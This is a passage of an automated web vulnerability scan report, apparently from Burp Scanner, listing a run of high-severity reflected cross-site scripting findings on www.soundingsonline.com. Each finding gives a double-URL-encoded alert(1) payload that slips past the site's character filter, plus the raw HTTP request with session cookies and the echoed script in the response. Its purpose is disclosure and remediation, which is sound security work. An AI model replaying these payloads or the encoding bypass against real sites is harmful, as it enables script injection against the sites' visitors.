The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d4ab"><script>alert(1)</script>fe6bf0d5746 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/profiles?9d4ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efe6bf0d5746=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/profiles?9d4ab"><script>alert(1)</script>fe6bf0d5746=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.893. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cdb26"><script>alert(1)</script>67cb149e626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/technical?cdb26%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67cb149e626=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/technical?cdb26"><script>alert(1)</script>67cb149e626=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.894. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b840b"><script>alert(1)</script>20e32f818ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/type-of-boat?b840b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20e32f818ce=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/type-of-boat?b840b"><script>alert(1)</script>20e32f818ce=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.895. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4c7f"><script>alert(1)</script>cbe605dcccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&a4c7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbe605dcccb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/buy-a-boat?a4c7f"><script>alert(1)</script>cbe605dcccb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.896. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbb5b"><script>alert(1)</script>d44198a6732 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/digital-publications?cbb5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed44198a6732=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/digital-publications?cbb5b"><script>alert(1)</script>d44198a6732=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.897. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2be4f"><script>alert(1)</script>52ad10d94f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /more/the-masters-series?2be4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52ad10d94f9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/the-masters-series?2be4f"><script>alert(1)</script>52ad10d94f9=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.898. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b74"><script>alert(1)</script>720e96da4e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news?47b74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e720e96da4e2=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news?47b74"><script>alert(1)</script>720e96da4e2=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.899. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51b8e"><script>alert(1)</script>c5c8ce41216 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/coastwise?51b8e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec5c8ce41216=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/coastwise?51b8e"><script>alert(1)</script>c5c8ce41216=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.900. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2aa18"><script>alert(1)</script>5ffa1ffcd40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/dispatches?2aa18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5ffa1ffcd40=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/dispatches?2aa18"><script>alert(1)</script>5ffa1ffcd40=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.901. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1ee0"><script>alert(1)</script>19a87dc7b6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home-waters?c1ee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19a87dc7b6e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/home-waters?c1ee0"><script>alert(1)</script>19a87dc7b6e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.902. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc446"><script>alert(1)</script>74fbf294bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/mishaps-a-rescues?fc446%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74fbf294bd7=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/mishaps-a-rescues?fc446"><script>alert(1)</script>74fbf294bd7=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.903. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 575f4"><script>alert(1)</script>c6b2abc3a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/mishaps-a-rescues/index.php?575f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6b2abc3a30=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
